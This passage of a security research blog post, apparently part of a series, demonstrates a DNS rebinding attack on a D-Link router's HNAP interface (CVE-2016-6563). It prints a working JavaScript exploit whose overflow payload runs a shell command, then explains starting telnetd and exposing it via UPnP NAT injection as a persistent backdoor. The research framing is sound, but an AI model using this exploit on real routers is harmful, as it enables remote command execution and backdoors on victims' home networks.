class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">src</span>=<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"jquery.min.js"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">exploit</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">xhr</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">XMLHttpRequest</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">open</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http:\/\/127-0-0-1.192-168-0-1.attacker.com\/HNAP1\/"</span>, <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Accept"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"*\/*"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Content-Type"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text\/xml; charset=utf-8"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"SOAPAction"</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http:\/\/purenetworks.com\/HNAP1\/Login"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"HNAP_AUTH"</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"7A6EA9269CBB71629F4EF2926343C7A1 1583173034"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">withCredentials</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">body</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"\x3c?xml version=\"1.0\" encoding=\"utf-8\"?\x3e\x3csoap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"\x3e\x3csoap:Body\x3e\x3cLogin xmlns=\"http://purenetworks.com/HNAP1/\"\x3e\x3cAction\x3erequest\x3c/Action\x3e\x3cUsername\x3eAdmin\x3c/Username\x3e\x3cLoginPassword\x3eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*\xb2n\x08BBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC*\xb4a\x04CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCtouch \/tmp\/testJS\x3c/LoginPassword\x3e\x3cCaptcha\x3e\x3c/Captcha\x3e\x3c/Login\x3e\x3c/soap:Body\x3e\x3c/soap:Envelope\x3e"</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">aBody</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">Uint8Array</span>(<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">body</span>.<span class="cm-property" style="box-sizing: border-box;">length</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> (<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">i</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>; <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span> <span class="cm-operator" style="box-sizing: border-box;"><</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>.<span class="cm-property" style="box-sizing: border-box;">length</span>; <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span><span class="cm-operator" style="box-sizing: border-box;">++</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>[<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span>] <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">body</span>.<span class="cm-property" style="box-sizing: border-box;">charCodeAt</span>(<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span>); </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">send</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">Blob</span>([<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>]));</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">start</span>() {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">jQuery</span>.<span class="cm-property" style="box-sizing: border-box;">ajax</span> ({</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">url</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"/info/Login.html"</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">type</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"GET"</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">data</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">""</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }).<span class="cm-property" style="box-sizing: border-box;">always</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> (<span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">data</span>,<span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">status</span>){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Checking SOP bypass..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span>(<span class="cm-variable" style="box-sizing: border-box;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">&&</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">data</span>.<span class="cm-property" style="box-sizing: border-box;">includes</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<title>D-LINK</title>"</span>)){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Sending Exploit..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">exploit</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">false</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">else</span>{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Waiting..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">poll</span>() {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">setTimeout</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span>(<span class="cm-variable" style="box-sizing: border-box;">trigger</span>){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">start</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">else</span>{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Exploit sent..."</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">6000</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">$</span>(<span class="cm-variable" style="box-sizing: border-box;">document</span>).<span class="cm-property" style="box-sizing: border-box;">ready</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>DNS Rebinding Attack against Dlink Router CVE-XXXXX<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">marquee</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>Insert here something...<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">marquee</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><span style="font-family: helvetica;"><div><span style="font-family: helvetica;">Below the screenshot showing the execution of the <i>xhr</i> request after the successful <i>DNS Rebinding</i> attack.</span></div><div><span style="font-family: helvetica;">The exploit was successfully executed and the "testJS" file was created on the filesystem of the router.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div style="text-align: center;"><span id="docs-internal-guid-fe155cc8-7fff-8289-0f94-35b1ea8312bd"><img height="172" src="https://lh6.googleusercontent.com/leubTyJ0ntk7VNyq9qnw3ecIvgy8pUsmDUzNKSYHVhMGWIMNWcCCTJCrRGvO86Fj5V4lA_4BwmytjJab8TuiWCTPk11xnu68gveS3UujPtDNrZtu17GVtp1iQYxzDYCX_jKbuK_o2NM=w320-h172" width="320" /></span></div><br /><br /></span></div><div><span style="font-family: helvetica;">Following the complete <i>DNS Rebinding</i> attack scheme.</span><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8Lrxd-1VER0/YH76iiJdq0I/AAAAAAAAABU/JcytQ5XcerYnjtdBEB7ySHX-OT2s1hBIQCLcBGAsYHQ/s1031/rop_diagram.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="662" data-original-width="1031" height="205" src="https://1.bp.blogspot.com/-8Lrxd-1VER0/YH76iiJdq0I/AAAAAAAAABU/JcytQ5XcerYnjtdBEB7ySHX-OT2s1hBIQCLcBGAsYHQ/w320-h205/rop_diagram.png" width="320" /></span></a></div><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span style="font-family: helvetica;"><br /></span></p><h4 style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><span style="font-family: helvetica; white-space: pre-wrap;"><b><br /></b></span></span></h4><h4 style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><span style="font-family: helvetica; white-space: pre-wrap;"><b>Getting Persistence using DNS Rebinding + UPnP NAT Injection + <i>telnetd</i> service</b></span></span></h4><p style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: helvetica;"><br /></span></p><p style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: helvetica;">The next step for an attacker would be to create a backdoor in order to get persistent access to the victim's device.</span></p><span style="font-family: helvetica;"><br />During the static firmware analysis we noticed the existence of "/usr/sbin/telnetd" within the firmware, so we could force the router to run the <i>telnetd</i> service just by replacing his path in the working exploit. </span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;">Following the generated HTTP request.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JF6kxyfsdl0/YImNNQ0h6-I/AAAAAAAAABs/0LUssnx8LYogCBOq9EHn_-oYzwikFJRMQCLcBGAsYHQ/s1217/Screenshot_20210428_182757.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="259" data-original-width="1217" src="https://1.bp.blogspot.com/-JF6kxyfsdl0/YImNNQ0h6-I/AAAAAAAAABs/0LUssnx8LYogCBOq9EHn_-oYzwikFJRMQCLcBGAsYHQ/s16000/Screenshot_20210428_182757.png" /></span></a></div><span style="font-family: helvetica;"><br /><br />The service was executed on the machine as shown in the following screenshot that shows the <i>nmap</i> output before and after the exploit execution.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;">Telnet service status before the exploit execution:</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mGvtiQBYH6k/YQQdwY-1RBI/AAAAAAAAAEk/_BJQ72Uuz0Ia3YrF6KR84NdQGHi8nZVjACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="252" data-original-width="933" height="86" src="https://lh3.googleusercontent.com/-mGvtiQBYH6k/YQQdwY-1RBI/AAAAAAAAAEk/_BJQ72Uuz0Ia3YrF6KR84NdQGHi8nZVjACLcBGAsYHQ/image.png" width="320" /></a></div><br /><br /></span><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;">Telnet service started after the exploit execution:</span></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><a href="https://lh3.googleusercontent.com/-Fv5cuUPF9MU/YQQeFFyZnvI/AAAAAAAAAEs/fi7C74UrmFIIzdDB9xXqruoalaKhUoGTQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="250" data-original-width="911" height="88" src="https://lh3.googleusercontent.com/-Fv5cuUPF9MU/YQQeFFyZnvI/AAAAAAAAAEs/fi7C74UrmFIIzdDB9xXqruoalaKhUoGTQCLcBGAsYHQ/image.png" width="320" /></a></span></div><p></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><a href="https://lh3.googleusercontent.com/-YL2v9UJ0ubM/YQQeJdfoBFI/AAAAAAAAAEw/MqhaKelVYVUeeou6hxM5QmtEMNvwlcjaQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="326" data-original-width="1079" height="97" src="https://lh3.googleusercontent.com/-YL2v9UJ0ubM/YQQeJdfoBFI/AAAAAAAAAEw/MqhaKelVYVUeeou6hxM5QmtEMNvwlcjaQCLcBGAsYHQ/image.png" width="320" /></a></span></div><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><br /></span><p></p><h4 style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;">Conclusion</span></h4><p style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; text-align: left;"></p><div><span style="font-family: helvetica; font-size: 16px; white-space: pre-wrap;">We were able to use the <i>DNS Rebinding</i> attack against </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" style="font-family: helvetica; font-size: 16px; white-space: pre-wrap;" target="_blank">CVE-2016-6563</a> <span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">proving that it is possible to execute a Remote Command Execution against a not public facing service, as the web interface of a router.</span></div></div><div><span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;"><br /></span></div><div><span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">Moreover, we have used the <i>UPnP</i> <i>NAT Injection</i> technique from the </span><a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" style="font-family: helvetica;" target="_blank">first</a> <span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">part to expose the <i>telnetd</i> service to the public interface in order to get a remote backdoor.</span></div><div><p></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;"><span style="white-space: pre-wrap;">Below the Attack Tree of the proposed attack:</span></span></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: helvetica;"><a href="https://1.bp.blogspot.com/-GIJHLg9xXsU/YKU1jprlCEI/AAAAAAAAACM/aJA5ejcEpvcQRqFfyj6-Ta2eQrxX9BtEQCLcBGAsYHQ/s698/Screenshot_20210519_175741.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="581" data-original-width="698" height="408" src="https://1.bp.blogspot.com/-GIJHLg9xXsU/YKU1jprlCEI/AAAAAAAAACM/aJA5ejcEpvcQRqFfyj6-Ta2eQrxX9BtEQCLcBGAsYHQ/w490-h408/Screenshot_20210519_175741.png" width="490" /></a></span></div><span style="font-family: helvetica;"><br /></span><p></p><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.875rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><span style="font-size: small;">References</span>:</span></h4><p cid="n97" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"></p><ul style="text-align: left;"><li><span style="white-space: pre-wrap;"><a 